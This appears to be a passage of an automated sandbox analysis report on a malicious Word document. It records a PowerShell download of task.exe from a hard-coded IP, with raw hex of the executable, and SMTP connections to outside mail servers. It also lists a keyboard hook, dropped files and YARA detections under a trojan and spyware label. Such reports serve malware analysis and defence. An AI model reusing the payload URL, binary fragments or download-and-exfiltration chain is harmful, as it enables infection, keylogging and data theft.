00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.19.9Date: Thu, 25 Nov 2021 17:21:28 GMTContent-Type: application/octet-streamContent-Length: 504832Last-Modified: Thu, 25 Nov 2021 10:52:42 GMTConnection: keep-aliveETag: "619f6afa-7b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 0
                    Source: global trafficHTTP traffic detected: GET /task.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 173.232.204.89Connection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox ViewASN Name: EONIX-COMMUNICATIONS-ASBLOCK-62904US EONIX-COMMUNICATIONS-ASBLOCK-62904US
                    Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                    Source: Joe Sandbox ViewIP Address: 208.91.199.224 208.91.199.224
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 208.91.199.224:587
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 208.91.199.224:587
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587
                    Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232
                    Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.2
                    Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/t
                    Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/task.ex
                    Source: powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.425635089.0000000002D8F000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/task.exe
                    Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/task.exePE
                    Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.438810509.0000000003839000.00000004.00000001.sdmpString found in binary or memory: http://173.232.204.89
                    Source: powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmpString found in binary or memory: http://173.232.204.89/task.exe
                    Source: powershell.exe, 00000003.00000002.429782897.00000000001F9000.00000004.00000020.sdmpString found in binary or memory: http://java.lp
                    Source: powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                    Source: powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                    Source: task.exe, 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{527B5D4D-3E6F-42BD-8FFA-6C52D5EDBEDF}.tmpJump to behavior
                    Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
                    Source: global trafficHTTP traffic detected: GET /task.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 173.232.204.89Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /task.exe HTTP/1.1Host: 173.232.204.89Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Installs a global keyboard hookShow sources
                    Source: C:\Users\user\AppData\Roaming\task.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\task.exe
                    Source: C:\Users\user\AppData\Roaming\task.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary:

                    barindex
                    Document contains OLE streams with names of living off the land binariesShow sources
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drStream path '_1699369627/\x1Ole10Native' : L}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.l.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drStream path '_1699369659/\x1Ole10Native' : <~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Powershell drops PE fileShow sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\task.exeJump to dropped file
                    .NET source code contains very large array initializationsShow sources
                    Source: 14.0.task.exe.400000.11.unpack, u003cPrivateImplementationDetailsu003eu007b58494291u002d801Du002d4F82u002dA213u002d350FC89214C0u007d/u0034EFFEBBBu002d9C57u002d41F6u002dB4B3u002d5EB0A7648FCF.csLarge array initialization: .cctor: array initializer size 12035
                    Microsoft Office creates scripting filesShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Office process drops PE fileShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exeJump to dropped file
                    Document contains a stream with embedded javascript codeShow sources
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drStream path '_1699369627/\x1Ole10Native' : Found JS content: L}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.l............................................................................................................................................................
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drStream path '_1699369659/\x1Ole10Native' : Found JS content: <~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|.....................................................................................................................................
                    Found suspicious RTF objectsShow sources
                    Source: abdtfhgXgeghDp.ScTStatic RTF information: Object: 0 Offset: 000007DAh abdtfhgXgeghDp.ScT
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drOLE indicator application name: unknown
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 9_2_002561F8
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 9_2_00256208
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 9_2_00256448
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 9_2_00256458
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 9_2_00251DE0
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_003A65D8
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_003AD680
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_003A59C0
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_003A5D08
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_003A2297
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_003A2608
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_003ADE38
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BE1298
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BE5CE0
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BE0048
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BE37A0
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BEA930
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BECB00
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BE0006
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BE8160
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BE8950
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_021F0048
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\SzfukVRF.exe A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\task.exe A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
                    Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 76E90000 page execute and read and write
                    Source: 00000005.00000002.424289946.0000000000360000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: 00000003.00000002.429522504.0000000000170000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drOLE indicator has summary info: false
                    Source: task[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: task.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: SzfukVRF.exe.9.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$GO DEL SALDO.docJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@21/27@8/3
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drOLE document summary: title field not present or empty
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drOLE document summary: author field not present or empty
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drOLE document summary: edited time not present or 0
                    Source: C:\Users\user\AppData\Roaming\task.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................7.....p.........7.......2.....`I4........v.....................K;.....................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................E.k......................W.............}..v....0.......0...............x"z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...h.......0................!z.....6.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................E.k.... .................W.............}..v............0...............x"z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0................!z.....".......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................E.k....h.................W.............}..v............0...............x"z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............1E.k.... %z...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................E.k....h.................W.............}..v............0...............x"z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............1E.k.... %z...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................E.k....h.................W.............}..v............0...............x"z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'. .......0................!z.....8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................E.k......................W.............}..v....X.......0...............x"z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............1E.k......................W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................E.k......................W.............}..v....P.......0...............x"z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....w...............1E.k.... %z...............W.............}..v............0.......................f.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................E.k....@.................W.............}..v............0...............x"z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......1E.k.... %z...............W.............}..v....P.......0................!z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................E.k......................W.............}..v............0...............x"z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E........................k......z...............W.............}..v.....H......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....I................W.............}..v.....J......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......z...............W.............}..v.....P......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....HQ................W.............}..v.....Q......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.7.............}..v.....U......0...............h.z.....$.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....V................W.............}..v.....W......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......z...............W.............}..v.....]......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....^................W.............}..v....._......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v.....e......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....f................W.............}..v.....g......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.Hk......0...............h.z.....8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....l................W.............}..v.....l......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......z...............W.............}..v....Hs......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....t................W.............}..v.....t......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....x......0...............h.z.....&.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....Py................W.............}..v.....y......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......z...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....P.................W.............}..v............0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............h.z.....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v....H.......0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ..........k......z...............W.............}..v............0...............h.z.............................
